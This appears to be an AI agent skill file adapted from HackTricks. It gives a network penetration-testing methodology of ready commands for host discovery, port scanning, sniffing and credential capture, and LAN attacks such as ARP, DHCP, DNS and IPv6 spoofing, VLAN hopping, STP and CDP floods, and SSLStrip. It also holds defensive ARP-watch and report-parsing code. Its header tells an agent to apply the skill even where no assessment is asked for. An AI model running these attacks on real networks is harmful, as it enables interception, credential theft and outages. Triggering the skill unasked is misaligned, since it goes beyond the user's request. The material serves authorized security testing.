Hacktricks-skills network-pentest

Network penetration testing and security assessment. Use this skill whenever the user mentions network security testing, penetration testing, network assessment, port scanning, vulnerability discovery, network reconnaissance, ARP spoofing, VLAN attacks, sniffing, or any network-related security testing. This skill provides structured methodologies for discovering hosts, scanning ports, performing LAN attacks, and documenting findings. Make sure to use this skill for any network security assessment task, even if the user doesn't explicitly ask for a 'pentest' or 'security assessment'.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/generic-methodologies-and-resources/pentesting-network/pentesting-network/SKILL.MD
source content

Network Pentesting Skill

A comprehensive skill for conducting network security assessments and penetration tests. This skill provides structured methodologies for network discovery, scanning, and attack techniques.

Before You Start

Important: Always ensure you have proper authorization before performing any network security testing. Unauthorized network scanning or attacks may be illegal.

Workflow Overview

  1. Reconnaissance - Discover hosts and services
  2. Scanning - Identify open ports and services
  3. Enumeration - Gather detailed information
  4. Exploitation - Test vulnerabilities (if authorized)
  5. Documentation - Record findings

Phase 1: Network Discovery

External Discovery (From Internet)

When you need to discover hosts from outside a network:

ICMP Discovery (Fastest)

# Single host
ping -c 1 <IP>

# Range scan
fping -g <network>/24

# Advanced ICMP types (bypasses some filters)
nmap -PE -PM -PP -sn -n <network>/24

TCP Port Discovery

When ICMP is filtered, scan common ports:

# Masscan for speed (top 20 ports, <5 min for /24)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 <network>/24

# HTTP-focused
masscan -p80,443,8000-8100,8443 <network>/24

UDP Discovery

# Nmap with version detection
nmap -sU -sV --version-intensity 0 -F -n <network>/24

# Fast UDP scanner (1 min for /24)
./udp-proto-scanner.pl <network>/24

Internal Discovery (From Inside Network)

Passive Discovery

# ARP cache monitoring
netdiscover -p

# Traffic analysis
p0f -i <interface> -p -o /tmp/p0f.log

# Bettercap passive
net.recon on
net.show
set net.show.meta true

Active Discovery

# ARP scan
nmap -sn <network>
netdiscover -r <network>

# NetBIOS discovery
nbtscan -r <network>

# Bettercap active probing
net.probe on
set net.probe.mdns true
set net.probe.nbns true
set net.probe.upnp true
set net.probe.wsd true

# IPv6 discovery
alive6 <interface>

Wake-on-LAN

# Bettercap WOL
wol.eth [MAC]  # Raw ethernet packet
wol.udp [MAC]  # UDP broadcast to port 9

Phase 2: Port Scanning

TCP Scanning

# Fast scan (top 1000 ports)
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>

# Full port scan (all 65535 ports)
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>

# Slower full scan (avoid failures)
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

# Bettercap SYN scan
syn.scan <network> 1 10000

UDP Scanning

# Common UDP services
udp-proto-scanner.pl <IP>

# Top 100 UDP ports
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>

# With default scripts
nmap -sU -sV -sC -n -F -T4 <IP>

# Top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>

SCTP Scanning

# Fast SCTP scan (default port list)
nmap -T4 -sY -n -oA SCTFastScan <IP>

# Full SCTP scan (all ports; nmap rejects -F together with -p-, so -F is omitted here)
nmap -T4 -p- -sY -sV -sC -n -oA SCTAllScan <IP>

Phase 3: Network Sniffing

TCPDump

# DNS traffic
sudo tcpdump -i <interface> udp port 53

# ICMP traffic
tcpdump -i <interface> icmp

# HTTP/HTTPS to file (rotate every 5 min)
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

# Remote capture via SSH
ssh user@<IP> tcpdump -i <interface> -U -s0 -w - | sudo wireshark -k -i -

Bettercap Sniffing

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap
set net.sniff.local false
set net.sniff.filter "not arp"

Credential Capture

# Parse credentials from pcap
git clone https://github.com/lgandx/PCredz
cd PCredz && ./PCredz.py <capture.pcap>

Phase 4: LAN Attacks

ARP Spoofing

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Bettercap
arp.spoof on
set arp.spoof.targets <IP>
set arp.spoof.fullduplex true
set arp.spoof.internal true

# Arpspoof (two terminals)
arpspoof -t <gateway> <victim>
arpspoof -t <victim> <gateway>
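
As an added defender-side example that is not part of the original skill, the following Python parses raw Ethernet/ARP frames and flags an IP whose advertised MAC changes, which is how an ARP spoofing run like the one above shows up on the wire; it also flags a frame whose Ethernet source and ARP sender address disagree. The frames, MAC addresses and IPs are constructed for the example.

```python
import socket
import struct
from typing import Dict, List, Optional

ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ETHERTYPE_ARP = b"\x08\x06"

def build_arp_reply(sender_mac: bytes, sender_ip: str, target_mac: bytes, target_ip: str) -> bytes:
    """Constructed sample input: a 42-byte Ethernet frame carrying an ARP reply (opcode 2)."""
    eth = target_mac + sender_mac + ETHERTYPE_ARP
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, 2,
                      sender_mac, socket.inet_aton(sender_ip),
                      target_mac, socket.inet_aton(target_ip))
    return eth + arp

def fmt_mac(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)

class ArpWatch:
    """Remember the first MAC seen for each IP in ARP replies and alert when it changes."""
    def __init__(self) -> None:
        self.bindings: Dict[str, bytes] = {}

    def observe(self, frame: bytes) -> Optional[str]:
        if len(frame) < 42 or frame[12:14] != ETHERTYPE_ARP:
            return None                      # not an ARP frame
        _, ptype, _, _, oper, sha, spa, _, _ = struct.unpack(ARP_FMT, frame[14:42])
        if ptype != 0x0800 or oper != 2:
            return None                      # only IPv4 replies assert a binding
        ip = socket.inet_ntoa(spa)
        if frame[6:12] != sha:               # Ethernet source and ARP sender disagree
            return f"ALERT {ip}: ethernet src {fmt_mac(frame[6:12])} != arp sender {fmt_mac(sha)}"
        known = self.bindings.setdefault(ip, sha)
        if known != sha:
            return f"ALERT {ip} moved from {fmt_mac(known)} to {fmt_mac(sha)}"
        return None

def scan_capture(frames: List[bytes]) -> List[str]:
    """Run the watcher over a list of frames and return the alerts in order."""
    watcher = ArpWatch()
    return [a for a in (watcher.observe(f) for f in frames) if a]

# Constructed scenario: the gateway answers legitimately, then a second host claims its IP.
GATEWAY_MAC, ROGUE_MAC, CLIENT_MAC = (bytes.fromhex(h) for h in
                                      ("001122334455", "66778899aabb", "ccddeeff0011"))
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, "10.0.0.1", CLIENT_MAC, "10.0.0.50"),
    build_arp_reply(ROGUE_MAC, "10.0.0.1", CLIENT_MAC, "10.0.0.50"),
]
```

Feeding frames read from a pcap (for example the net.sniff output above) into `scan_capture` gives the same alerts for real traffic.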

VLAN Attacks

DTP Trunking Attack

# Install Yersinia
apt-get install yersinia

# Interactive mode
yersinia -I
# Select interface, then 'g' for protocol, 'x' for attack

# DTP hijacking
sudo python3 DTPHijacking.py --interface <interface>

VLAN Interface Creation

# Load the 802.1Q module and create a tagged sub-interface
modprobe 8021q
vconfig add <interface> <VLAN_ID>
# vconfig is deprecated; on current kernels use iproute2 instead:
# ip link add link <interface> name <interface>.<VLAN_ID> type vlan id <VLAN_ID>
# ip link set <interface>.<VLAN_ID> up

# Get IP via DHCP
dhclient <interface>.<VLAN_ID>

# Or set static IP (iproute2 equivalent: ip addr add <IP>/24 dev <interface>.<VLAN_ID>)
ifconfig <interface>.<VLAN_ID> <IP> netmask 255.255.255.0 up

# Scan the VLAN
arp-scan -I <interface>.<VLAN_ID> <network>/24

Double Tagging Attack

# Using Scapy: outer tag is the trunk's native VLAN, inner tag is the target VLAN
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='<victim>')/ICMP()
sendp(packet, iface='<interface>')

STP Attacks

# BPDU DoS
yersinia stp -attack 2  # Flood Configuration BPDUs
yersinia stp -attack 3  # Flood Topology Change Notification (TCN) BPDUs

# CAM table flush
yersinia stp -attack 1  # Send a single TCN BPDU

# Root bridge attack
yersinia stp -attack 4  # Claim the root role (become root switch)
yersinia stp -attack 6  # Claim the root role with MITM; DoS (layer 2 packets not forwarded)

CDP Attacks

# Passive collection (sniff CDP packets)
# Use Wireshark, tcpdump, or Yersinia

# CDP DoS (flood fake devices)
yersinia cdp -attack 1

# CDP impersonation
yersinia cdp -attack 2  # Simulate new Cisco device
yersinia cdp -attack 0  # Send CDP packet

DHCP Attacks

# DHCP enumeration
nmap --script broadcast-dhcp-discover

# DHCP DoS
yersinia dhcp -attack 1  # Exhaust IP pool
yersinia dhcp -attack 3  # Release all IPs

# Rogue DHCP server
python /usr/share/responder/DHCP.py \
  -i <your_ip> \
  -r <real_gateway> \
  -p <your_dns> \
  -n 255.255.255.0 \
  -I <interface> \
  -w "http://<your_ip>/wpad.dat" \
  -S -R

Phase 5: Spoofing Attacks

DNS Spoofing

# Bettercap
set dns.spoof.hosts ./dns.spoof.hosts
dns.spoof on

# Dnsmasq
apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon

ICMP Redirect

# Using hping3
hping3 <victim> -C 5 -K 1 \
  -a <gateway> \
  --icmp-gw <attacker> \
  --icmp-ipdst <destination> \
  --icmp-ipsrc <victim>

IPv6 Spoofing

# Neighbor spoofing
sudo parasite6 -l <interface>
sudo fake_advertise6 -r -w 2 <interface> <router_ipv6>

# Router advertisement spoofing
sysctl -w net.ipv6.conf.all.forwarding=1
ip route add default via <router_ipv6> dev <interface>
fake_router6 <interface> <fe80_address>/16

# DHCPv6 spoofing (Bettercap)
set dhcp6.spoof.domains <domains>
dhcp6.spoof on

# Or the standalone mitm6 tool
mitm6 -d <domain>

Phase 6: Internet Attacks

SSLStrip

# Install and configure
apt-get install sslstrip

# Start sslstrip
sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k

# Redirect HTTP traffic
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Note: SSLStrip is largely ineffective against modern browsers with HSTS preloading. Consider sslStrip+ or dns2proxy for HSTS bypass (still limited effectiveness).


Phase 7: Bluetooth Attacks

L2CAP/ATT/GATT Testing

# Using the BlueBlue framework
from blueblue import *

src_bdaddr = '<local_bdaddr>'   # placeholder: Bluetooth address of the local adapter
dst_bdaddr = '<target_bdaddr>'  # placeholder: Bluetooth address of the device under test
acl = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')  # ACL link, Just Works pairing
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)  # L2CAP channel on the ATT PSM
gatt.send_frag(p8(GATT_READ)+p16(1234))         # ATT read request for attribute handle 1234
print(gatt.recv())

Documentation Template

Always document your findings:

# Network Security Assessment Report

## Target Information
- Network Range: <range>
- Date: <date>
- Assessor: <name>

## Discovery Results
### Live Hosts
| IP | MAC | Hostname | Status |
|----|-----|----------|--------|
| <IP> | <MAC> | <hostname> | <status> |

### Open Ports
| IP | Port | Service | Version |
|----|------|---------|--------|
| <IP> | <port> | <service> | <version> |

## Vulnerabilities Found
1. <vulnerability>
   - Severity: <critical/high/medium/low>
   - Description: <details>
   - Evidence: <proof>
   - Remediation: <recommendation>

## Attack Results
- ARP Spoofing: <success/fail>
- VLAN Hopping: <success/fail>
- DHCP Spoofing: <success/fail>

## Recommendations
1. <recommendation>
2. <recommendation>
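
The `-oA` scans in Phase 2 write a grepable `.gnmap` file next to the normal and XML output. As an added example that is not part of the original skill, the following Python parses that format and fills the Live Hosts and Open Ports tables of the template above; the embedded scan output is constructed for the example (the MAC column is left as n/a because `.gnmap` does not carry MAC addresses).

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of the fastscan.gnmap file that `nmap ... -oA fastscan` writes.
# Hosts, services and versions are made up for illustration.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -sC -O -T4 -n -Pn -oA fastscan 10.0.0.0/28
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 (protocol 2.0)/, 80/open/tcp//http//nginx 1.18.0/, 443/filtered/tcp//https///\tIgnored State: closed (997)
Host: 10.0.0.7 (printer.lan)\tStatus: Up
Host: 10.0.0.7 (printer.lan)\tPorts: 9100/open/tcp//jetdirect///\tIgnored State: closed (999)
# Nmap done -- 16 IP addresses (2 hosts up) scanned in 9.81 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")

def parse_gnmap(text: str) -> Tuple[Dict[str, str], List[Tuple[str, str, str, str]]]:
    """Return ({ip: hostname}, [(ip, port/proto, service, version), ...]) for open ports only."""
    hosts: Dict[str, str] = {}
    ports: List[Tuple[str, str, str, str]] = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # '# Nmap ...' comment lines
        ip, hostname, rest = m.groups()
        hosts.setdefault(ip, hostname)
        for field in rest.split("\t"):    # Status / Ports / Ignored State / OS ... are tab-separated
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # Each entry is port/state/protocol/owner/service/rpc_info/version/
                parts = entry.split("/")
                if len(parts) < 7 or parts[1] != "open":
                    continue
                ports.append((ip, f"{parts[0]}/{parts[2]}", parts[4], parts[6]))
    return hosts, ports

def render_report_tables(hosts: Dict[str, str], ports: List[Tuple[str, str, str, str]]) -> str:
    """Render the Live Hosts and Open Ports sections in the report template's table layout."""
    lines = ["### Live Hosts", "| IP | MAC | Hostname | Status |", "|----|-----|----------|--------|"]
    for ip, name in sorted(hosts.items(), key=lambda kv: tuple(int(o) for o in kv[0].split("."))):
        lines.append(f"| {ip} | n/a | {name or '-'} | up |")
    lines += ["", "### Open Ports", "| IP | Port | Service | Version |", "|----|------|---------|--------|"]
    for ip, port, service, version in ports:
        lines.append(f"| {ip} | {port} | {service or '-'} | {version or '-'} |")
    return "\n".join(lines)
```

Nmap replaces any `/` inside service and version strings with `|` in grepable output, so splitting each entry on `/` is safe.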

Tool Quick Reference

| Tool | Purpose | Command |
|------|---------|---------|
| nmap | Port scanning | nmap -sV -sC <target> |
| masscan | Fast port scanning | masscan -p<ports> <target> |
| bettercap | MITM attacks | bettercap |
| yersinia | Protocol attacks | yersinia -I |
| tcpdump | Packet capture | tcpdump -i <iface> <filter> |
| arp-scan | ARP discovery | arp-scan -l |
| responder | LLMNR/NBT-NS spoofing | responder -I <iface> |
| sslstrip | SSL downgrading | sslstrip -l 10000 |

Safety Reminders

  1. Authorization: Always have written permission before testing
  2. Scope: Stay within agreed network boundaries
  3. Timing: Avoid production hours for disruptive tests
  4. Backup: Document network state before attacks
  5. Legal: Understand local laws regarding network testing
  6. Cleanup: Restore network to original state after testing

When to Use This Skill

Use this skill when:

  • User mentions network security testing or penetration testing
  • User needs to discover hosts on a network
  • User wants to scan ports or enumerate services
  • User is conducting a security assessment
  • User mentions specific attack techniques (ARP spoofing, VLAN attacks, etc.)
  • User needs documentation templates for security findings
  • User asks about network reconnaissance tools
  • User mentions network protocols in a security context (CDP, STP, DHCP, etc.)

This skill provides the methodology, commands, and best practices for professional network security assessments.